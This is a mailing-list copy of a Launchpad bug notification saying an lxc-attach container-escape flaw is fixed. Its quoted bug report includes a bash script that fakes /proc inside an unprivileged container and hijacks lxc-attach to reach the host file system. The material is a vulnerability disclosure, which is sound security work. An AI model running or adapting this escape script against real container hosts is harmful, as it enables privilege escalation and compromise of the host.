group.of.nepali.translators team mailing list archive

Thread
Date

[Bug 1639345] Re: lxc-attach to malicious container allows access to host

To: group.of.nepali.translators@xxxxxxxxxxxxxxxxxxx
From: Launchpad Bug Tracker <1639345@xxxxxxxxxxxxxxxxxx>
Date: Tue, 06 Dec 2016 09:19:54 -0000
Reply-to: Bug 1639345 <1639345@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

This bug was fixed in the package linux - 4.8.0-30.32

---------------
linux (4.8.0-30.32) yakkety; urgency=low

  * CVE-2016-8655 (LP: #1646318)
    - packet: fix race condition in packet_set_ring

 -- Brad Figg <brad.figg@xxxxxxxxxxxxx>  Thu, 01 Dec 2016 08:02:53 -0800

** Changed in: linux (Ubuntu)
       Status: Triaged => Fix Released

** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2016-8655

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Fix Released
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information
  to disable dropping of capabilities and may in the end access the host
  file system by winning a very easy race against lxc-attach.

  In guest sequence:

  cat <<EOF > /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  Exploit uses fixed fd=7 for attacking, on other test environment, it
  might be other fd. Tests were performed by attacking lxc-attach
  started by

  screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also
  not fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS

  
  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions